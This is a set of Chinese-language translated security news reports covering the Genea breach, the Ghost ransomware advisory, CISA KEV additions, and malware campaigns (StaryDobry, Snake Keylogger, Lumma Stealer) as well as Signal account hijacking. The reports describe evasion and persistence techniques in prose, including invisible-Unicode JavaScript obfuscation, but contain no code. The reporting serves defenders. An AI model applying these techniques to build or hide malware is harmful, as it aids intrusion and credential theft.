HackerNews 编译，转载请注明出处： Genea 是澳大利亚最大的生育服务提供商之一，该公司披露未知攻击者入侵了其网络并访问了受攻击系统中存储的数据。 Genea 周三发表声明称，在检测到网络上的“可疑活动”后，正在“紧急调查一起网络事件”。 “我们的调查发现，未经授权的第三方访问了 Genea 的数据。我们正在紧急调查被访问数据的性质和范围，以及其中包含个人身份信息的程度，”该公司透露。“如果我们的调查发现任何个人身份信息受到影响的证据，我们将与相关人员沟通。” Genea 还表示，正在努力恢复为控制漏洞而关闭的服务器，并确保公司的系统安全。 尽管公司未披露此次攻击是否以任何方式扰乱了其运营，但已告知患者，如果治疗计划有任何变化，将会通知他们。 “我们对此次事件可能引起的任何担忧深表歉意，并希望向患者保证，我们非常重视您的隐私和数据安全，”Genea 表示。“我们还希望向您保证，我们的专家团队、护士和办公室支持人员正在夜以继日地工作，以确保您的治疗受到的干扰最小，这是我们的首要任务和重中之重。” 尽管公司尚未透露漏洞何时被发现，或患者个人和健康信息是否被泄露，但 Genea 确认遭遇漏洞的消息是在电话故障影响该集团生育诊所的五天后发布的。 在对电话故障公告的回复中，患者还透露该公司的 MyGenea 应用程序也已停机。 这家体外受精（IVF）服务提供商（1986 年成立，最初名为悉尼 IVF）在新南威尔士州、南澳大利亚州、西澳大利亚州、墨尔本、堪培拉和昆士兰的 22 家生育诊所提供各种服务，包括生育治疗、检查、基因服务、保存选项和捐赠者计划。 据澳大利亚国家广播公司首次报道，Genea 以及另外两家公司（Monash IVF 和 Virtus）占该国行业总收入的 80% 以上。 当 BleepingComputer 今天早些时候联系 Genea 发言人时，对方未能立即发表评论。   消息来源：Bleeping Computer； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 一种新的 JavaScript 混淆方法利用隐形 Unicode 字符来表示二进制值，这种方法正在针对美国政治行动委员会（PAC）附属机构的网络钓鱼攻击中被积极利用。 Juniper Threat Labs 发现了这次攻击，报告称该攻击发生在 2025 年 1 月初，显示出高度复杂性，包括使用以下手段： 使用个性化非公开信息来针对受害者， 使用调试器断点和时间检查来规避检测， 使用递归包装的 Postmark 跟踪链接来掩盖最终的网络钓鱼目的地。 JavaScript 开发者 Martin Kleppe 于 2024 年 10 月首次披露了这种混淆技术，其在实际攻击中的快速采用突显了新研究如何迅速被武器化。 使 JS 负载“隐形” 这种新的混淆技术利用了隐形 Unicode 字符，特别是 Hangul 半角（U+FFA0）和 Hangul 全角（U+3164）字符。 JavaScript 负载中的每个 ASCII 字符都被转换为 8 位二进制表示，其中的二进制值（1 和 0）被替换为隐形的 Hangul 字符。 混淆后的代码存储为 JavaScript 对象的一个属性，由于 Hangul 填充字符显示为空白，脚本中的负载看起来是空的，如下图所示。 空白处隐藏恶意代码 一个简短的引导脚本使用 JavaScript Proxy 的 get() trap 来检索隐藏的负载。当访问隐藏属性时，Proxy 将隐形的 Hangul 填充字符转换回二进制，并重建原始的 JavaScript 代码。 Juniper 的分析师报告称，攻击者除了上述手段外，还采取了额外的隐藏步骤，例如使用 base64 编码脚本和使用反调试检查来规避分析。 “这些攻击高度个性化，包括非公开信息，初始 JavaScript 会尝试在被分析时调用调试器断点，检测到延迟后，然后通过重定向到良性网站来中止攻击，”Juniper 解释道。 这些攻击难以检测，因为空白减少了安全扫描器将其标记为恶意的可能性。 由于负载只是对象中的一个属性，它可以被注入到合法脚本中而不引起怀疑；此外，整个编码过程易于实现，不需要高级知识。 Juniper 表示，此次活动中使用的两个域名此前与 Tycoon 2FA 网络钓鱼工具包有关。 如果是这样，我们可能会在未来看到这种隐形混淆方法被更广泛的攻击者采用。   消息来源：Bleeping Computer； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： CISA 和 FBI 表示，部署 Ghost 勒索软件的攻击者已经入侵了包括关键基础设施组织在内的多个行业的受害者，涉及超过 70 个国家。 受影响的行业还包括医疗保健、政府、教育、技术、制造业以及众多中小企业。 “从 2021 年初开始，Ghost 攻击者开始攻击那些互联网服务运行过时软件和固件版本的受害者，”CISA、FBI 和多州信息共享与分析中心（MS-ISAC）在周三发布的一份联合公告中表示。 “这种对包含漏洞的网络的无差别攻击已导致超过 70 个国家的组织被攻陷，包括中国的组织。” Ghost 勒索软件运营商经常更换其恶意软件可执行文件，更改加密文件的文件扩展名，修改勒索信内容，并使用多个电子邮件地址进行勒索通信，这导致该组织的归属随时间波动。 与该组织相关的名称包括 Ghost、Cring、Crypt3r、Phantom、Strike、Hello、Wickrme、HsHarada 和 Rapture，其攻击中使用的勒索软件样本包括 Cring.exe、Ghost.exe、ElysiumO.exe 和 Locker.exe。 这个以经济利益为动机的勒索软件组织利用公开可用的代码来利用易受攻击服务器的安全漏洞。他们针对的是 Fortinet（CVE-2018-13379）、ColdFusion（CVE-2010-2861、CVE-2009-3960）和 Exchange（CVE-2021-34473、CVE-2021-34523、CVE-2021-31207）中未修补的漏洞。 为了防御 Ghost 勒索软件攻击，网络安全防御者被建议采取以下措施： 制作定期的异地系统备份，防止被勒索软件加密， 尽快修补操作系统、软件和固件的漏洞， 关注 Ghost 勒索软件针对的安全漏洞（即 CVE-2018-13379、CVE-2010-2861、CVE-2009-3960、CVE-2021-34473、CVE-2021-34523、CVE-2021-31207）， 对网络进行分段，限制从受感染设备的横向移动， 对所有特权账户和电子邮件服务账户强制使用抗网络钓鱼的多因素认证（MFA）。 在 Amigo_A 和 Swisscom 的 CSIRT 团队于 2021 年初首次发现 Ghost 勒索软件后，其运营商开始投放定制的 Mimikatz 样本，随后是 Cobalt Strike 信标，并使用合法的 Windows CertUtil 证书管理器部署勒索软件有效载荷，以绕过安全软件。 除了在 Ghost 勒索软件攻击中用于初始访问外，针对 Fortinet SSL VPN 设备的漏洞 CVE-2018-13379 的国家级黑客组织也被发现进行了攻击。 攻击者还利用同一安全漏洞攻陷了可通过互联网访问的美国选举支持系统。 Fortinet 在 2019 年 8 月、2020 年 7 月、2020 年 11 月和 2021 年 4 月多次警告客户修补其 SSL VPN 设备以应对 CVE-2018-13379。 CISA、FBI 和 MS-ISAC 今天发布的联合公告还包含了与 FBI 调查中识别的先前 Ghost 勒索软件活动相关的妥协指标（IOCs）、战术、技术和程序（TTPs）以及检测方法，这些调查最近一次是在 2025 年 1 月。   消息来源：Bleeping Computer； 本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 美国网络安全和基础设施安全局（CISA）周二将影响 Palo Alto Networks PAN-OS 和 SonicWall SonicOS SSLVPN 的两个安全漏洞添加到其已知被利用漏洞（KEV）目录中，基于这些漏洞正在被积极利用的证据。 这两个漏洞如下： CVE-2025-0108（CVSS 评分：7.8）：Palo Alto Networks PAN-OS 管理 Web 界面中的身份验证绕过漏洞，允许未授权的攻击者通过网络访问管理 Web 界面，绕过通常需要的身份验证并调用某些 PHP 脚本。 CVE-2024-53704（CVSS 评分：8.2）：SSLVPN 身份验证机制中的身份验证不当漏洞，允许远程攻击者绕过身份验证。 Palo Alto Networks 已确认观察到针对 CVE-2025-0108 的积极利用尝试，并指出该漏洞可以与其他漏洞（如 CVE-2024-9474）结合使用，以允许未经授权访问未修补和未安全配置的防火墙。 “Palo Alto Networks 观察到在未修补和未安全配置的 PAN-OS Web 管理界面上，CVE-2025-0108 与 CVE-2024-9474 和 CVE-2025-0111 的利用尝试，”该公司在更新的公告中表示。 威胁情报公司 GreyNoise 表示，多达 25 个恶意 IP 地址正在积极利用 CVE-2025-0108，自近一周前被检测到以来，攻击者活动量增加了 10 倍。攻击流量的前三大来源是美国、德国和荷兰。 至于 CVE-2024-53704，网络安全公司 Arctic Wolf 透露，威胁行为者在 Bishop Fox 提供概念验证（PoC）后不久就开始利用该漏洞。 鉴于这些漏洞正在被积极利用，联邦民用执行部门（FCEB）机构被要求在 2025 年 3 月 11 日之前修复这些漏洞，以确保其网络的安全。   消息来源：The Hacker News；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 特洛伊木马式游戏安装程序在大规模 StaryDobry 攻击中部署加密货币矿工，卡巴斯基将这一大规模活动命名为 StaryDobry，该活动于 2024 年 12 月 31 日首次被检测到，持续了一个月。此次攻击的目标是全球的个人和企业，卡巴斯基的遥测数据显示，俄罗斯、巴西、德国、白俄罗斯和哈萨克斯坦的感染浓度较高。 研究人员塔季扬娜·什什科娃（Tatyana Shishkova）和基里尔·科尔切米尼（Kirill Korchemny）在周二发布的一份分析报告中表示：“这种方法帮助威胁行为者充分利用了矿工植入，目标是强大的游戏机，这些机器能够维持挖矿活动。” 此次 XMRig 加密货币矿工活动利用了流行的模拟和物理游戏，如 BeamNG.drive、Garry’s Mod、Dyson Sphere Program、Universe Sandbox 和 Plutocracy，作为诱饵发起复杂的攻击链。这包括在 2024 年 9 月将使用 Inno Setup 制作的被投毒的游戏安装程序上传到各种种子网站，表明活动背后的不明威胁行为者精心策划了这些攻击。 下载这些发布版本（也称为“重打包”）的用户会看到一个安装程序界面，提示他们继续进行安装过程，在此过程中会提取并执行一个投放器（“unrar.dll”）。 该 DLL 文件在确定是否在调试或沙盒环境中运行后才会继续执行，这表明其具有高度的规避行为。随后，它会查询多个网站，如 api.myip [.]com、ip-api [.]com 和 ipwho [.]is，以获取用户的 IP 地址并估算其位置。如果这一步失败，国家默认为中国或白俄罗斯，原因尚不清楚。 下一阶段涉及收集机器的指纹信息，解密另一个可执行文件（“MTX64.exe”），并将其内容写入磁盘上的文件 “Windows.Graphics.ThumbnailHandler.dll”，该文件位于 %SystemRoot% 或 %SystemRoot%\Sysnative 文件夹中。 基于一个名为 EpubShellExtThumbnailHandler 的合法开源项目，MTX64 通过加载下一阶段的有效载荷（一个名为 Kickstarter 的便携式可执行文件），修改了 Windows Shell Extension Thumbnail Handler 功能，以谋取自身利益，然后解包嵌入其中的加密数据块。 该数据块与前一步类似，被写入磁盘，文件名为 “Unix.Directory.IconHandler.dll”，位于文件夹 %appdata\Roaming\Microsoft\Credentials%InstallDate%\ 中。 新创建的 DLL 被配置为从远程服务器获取最终阶段的二进制文件，该服务器负责运行矿工植入，同时还会持续检查运行进程列表中的 taskmgr.exe 和 procmon.exe。如果检测到这些进程中的任何一个，该工件将立即终止。 该矿工是一个经过轻微修改的 XMRig 版本，使用预定义的命令行在具有 8 个或更多核心的 CPU 上启动挖矿过程。“如果少于 8 个，矿工不会启动，”研究人员表示。“此外，攻击者选择在他们自己的基础设施中托管挖矿池服务器，而不是使用公共服务器。” “XMRig 使用其内置功能解析构建的命令行。矿工还会创建一个单独的线程来检查系统中运行的进程监控器，使用的方法与前一阶段相同。”由于缺乏可以将其与任何已知犯罪软件行为者联系起来的指标，StaryDobry 仍未被归因。尽管如此，样本中的俄语字符串表明可能存在说俄语的威胁行为者。   消息来源：The Hacker News；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： Fortinet FortiGuard Labs 报告称，一种新的 Snake Keylogger 恶意软件变种正在活跃攻击中国、土耳其、印度尼西亚和西班牙的 Windows 用户。该变种自今年年初以来已导致全球超过 2.8 亿次感染尝试被阻止。 “Snake Keylogger 通常通过包含恶意附件或链接的网络钓鱼邮件传播，旨在通过记录键盘输入、捕获凭据和监控剪贴板来从流行的网络浏览器（如 Chrome、Edge 和 Firefox）中窃取敏感信息，”安全研究员 Kevin Su 表示。 该恶意软件的其他功能使其能够使用简单邮件传输协议（SMTP）和 Telegram 机器人将窃取的信息 exfiltrate 到攻击者控制的服务器，从而使威胁行为者能够访问窃取的凭据和其他敏感数据。 最新攻击的显著特点是利用 AutoIt 脚本语言来传递和执行主要负载。换句话说，包含恶意软件的可执行文件是一个 AutoIt 编译的二进制文件，从而使其能够绕过传统的检测机制。 “使用 AutoIt 不仅通过将负载嵌入编译后的脚本中使静态分析复杂化，还启用了模仿良性自动化工具的动态行为，”Su 补充道。 一旦启动，Snake Keylogger 会将自身的一个副本投放到 “%Local_AppData%\supergroup” 文件夹中的 “ageless.exe” 文件中。它还会在 Windows 启动文件夹中投放另一个名为 “ageless.vbs” 的文件，以便每次系统重启时，Visual Basic Script (VBS) 会自动启动恶意软件。 通过这种持久化机制，Snake Keylogger 能够在相关进程被终止后仍然保持对受感染系统的访问并继续其恶意活动。 攻击链的最后一步是将主要负载注入到合法的 .NET 进程（如 “regsvcs.exe”）中，使用一种称为进程空洞的技术，使恶意软件能够在受信任的进程中隐藏自身并绕过检测。 Snake Keylogger 还被发现记录键盘输入，并使用诸如 checkip.dyndns[.]org 之类的网站来检索受害者的 IP 地址和地理位置信息。 “为了捕获键盘输入，它利用 SetWindowsHookEx API，将第一个参数设置为 WH_KEYBOARD_LL（标志 13），这是一个低级别的键盘钩子，用于监控键盘输入，”Su 表示。“这种技术使恶意软件能够记录敏感输入，如银行凭据。” 与此同时，CloudSEK 详细描述了一项活动，该活动利用与教育机构相关的被攻陷基础设施来分发伪装成 PDF 文档的恶意 LNK 文件，最终部署 Lumma Stealer 恶意软件。 该活动 targeting 金融、医疗保健、技术和媒体等行业，是一个多阶段攻击序列，导致密码、浏览器数据和加密货币钱包被盗。 “该活动的主要感染向量是使用恶意 LNK（快捷方式）文件，这些文件被设计成看起来像合法的 PDF 文档，”安全研究员 Mayank Sahariya 表示，并补充说这些文件托管在一个 WebDAV 服务器上，不知情的访问者在访问网站后会被重定向到该服务器。 LNK 文件本身会执行一个 PowerShell 命令，连接到远程服务器并检索下一阶段恶意软件，一个经过混淆的 JavaScript 代码，其中包含另一个 PowerShell，从同一服务器下载 Lumma Stealer 并执行它。 最近几周，还观察到通过混淆的 JavaScript 文件分发 stealer 恶意软件，以从受感染的 Windows 系统中收集广泛的敏感数据，并将其 exfiltrate 到由攻击者操作的 Telegram 机器人。 “攻击从一个混淆的 JavaScript 文件开始，该文件从开源服务获取编码字符串以执行 PowerShell 脚本，”Cyfirma 表示。 “该脚本随后从 IP 地址和 URL 缩短器下载 JPG 图像和文本文件，两者都使用隐写技术嵌入了恶意 MZ DOS 可执行文件。一旦执行，这些负载会部署 stealer 恶意软件。”   消息来源：The Hacker News；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 多个与俄罗斯有关的威胁行为者被观察到通过隐私导向的即时通讯应用 Signal，针对感兴趣的目标个体，以获得对其账户的未经授权访问。 “俄罗斯相关行为者试图 compromise Signal 账户的最新型且广泛使用的技术是滥用该应用合法的‘关联设备’功能，该功能允许多个设备同时使用 Signal，”谷歌威胁情报小组（GTIG）在一份报告中表示。 在这家科技巨头的威胁情报团队发现的攻击中，包括被追踪为 UNC5792 的威胁行为者，他们使用恶意二维码，一旦扫描，就会将受害者的账户链接到行为者控制的 Signal 实例。 因此，未来的消息会同步实时地传递给受害者和威胁行为者，从而让威胁行为者能够持续窃听受害者的对话。谷歌表示，UAC-0195 部分与一个名为 UAC-0195 的黑客组织重叠。 这些二维码已知会伪装成群组邀请、安全警报或来自 Signal 网站的合法设备配对说明。或者，恶意设备链接二维码被发现嵌入在伪装成乌克兰军队使用的专用应用的网络钓鱼页面中。 “UNC5792 已经在其控制的基础设施上托管了修改后的 Signal 群组邀请，设计得与合法的 Signal 群组邀请完全相同，”谷歌表示。 另一个与针对 Signal 的行为者有关的是 UNC4221（也称为 UAC-0185），它通过一个定制的网络钓鱼工具包，模仿乌克兰武装部队用于炮兵制导的 Kropyva 应用的某些方面，来针对乌克兰军事人员的 Signal 账户。 还使用了一种名为 PINPOINT 的轻量级 JavaScript 有效载荷，可以通过网络钓鱼页面收集基本用户信息和地理位置数据。 除了 UNC5792 和 UNC4221 之外，其他一些将目标对准 Signal 的敌对组织包括 Sandworm（也称为 APT44），它使用了一个名为 WAVESIGN 的 Windows 批处理脚本；Turla，它运行一个轻量级的 PowerShell 脚本；以及 UNC1151，它使用 Robocopy 实用程序从受感染的桌面 exfiltrate Signal 消息。 谷歌的披露是在微软威胁情报团队将俄罗斯威胁行为者 Star Blizzard 归因于一项类似的设备链接功能，以劫持 WhatsApp 账户的网络钓鱼活动一个多月后发布的。 上周，微软和 Volexity 还透露，多个俄罗斯威胁行为者正在利用一种称为设备代码网络钓鱼的技术，通过即时通讯应用（如 WhatsApp、Signal 和 Microsoft Teams）来登录受害者的账户。 “最近几个月，多个威胁行为者对 Signal 的操作重点，为安全即时通讯应用面临的日益增长的威胁发出了重要警告，这种威胁肯定会加剧，”谷歌表示。 “正如在广泛的 effort 中所反映的那样，这种对安全即时通讯应用的威胁不仅限于网络钓鱼和恶意软件交付等远程网络操作，还包括关键的 close-access 操作，其中威胁行为者可以短暂访问目标的未锁设备。” 这一披露还紧随发现一种新的搜索引擎优化（SEO）投毒活动，该活动使用伪装成 Signal、LINE、Gmail 和 Google Translate 等流行应用的假下载页面，向说中文的用户传递后门可执行文件。 “通过假下载页面传递的可执行文件遵循一致的执行模式，涉及临时文件提取、进程注入、安全修改和网络通信，”Hunt.io 表示，并补充说这些样本表现出与名为 MicroClip 的恶意软件相关的 infostealer 类似功能。   消息来源：The Hacker News；  本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文